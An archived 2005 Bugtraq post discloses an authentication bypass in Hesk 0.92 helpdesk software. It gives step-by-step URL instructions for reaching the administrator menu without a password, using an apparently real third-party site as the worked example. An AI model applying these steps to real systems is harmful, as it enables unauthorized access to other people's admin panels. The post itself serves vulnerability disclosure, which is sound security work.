[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Vulnerability in Helpdesk software Hesk 0.92

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Vulnerability in Helpdesk software Hesk 0.92
From: s2b@xxxxxxxxxxx
Date: 29 Aug 2005 12:26:14 -0000

By The Name Of Allah

Vulnerability in Helpdesk software Hesk ..

Vulnerability Type : Login into The Administrator Menu With out Password

Injected version : Helpdesk software Hesk 0.92

Vulnerability Example

http://www.springporttwppd.com/helpdesk/

add : admin.php

http://www.springporttwppd.com/helpdesk/admin.php

Choose the username : administrator

Put any password in the password field

change the url to : admin_main.php

http://www.springporttwppd.com/helpdesk/admin_main.php

You Are Noe in the Administrator menu ..

Thx For  : Devil-00 & ADBUCTER

Peace

Follow-Ups:
- Re: Vulnerability in Helpdesk software Hesk 0.92
  - From: Thomas Krüger

Prev by Date: Re: unload event in ie/mozilla/opera
Next by Date: WASC-Articles: 'Preventing Log Evasion in IIS'
Previous by thread: SimplePHPBlog Arbitrary File Deletion and Sample Exploit
Next by thread: Re: Vulnerability in Helpdesk software Hesk 0.92
Index(es):
- Date
- Thread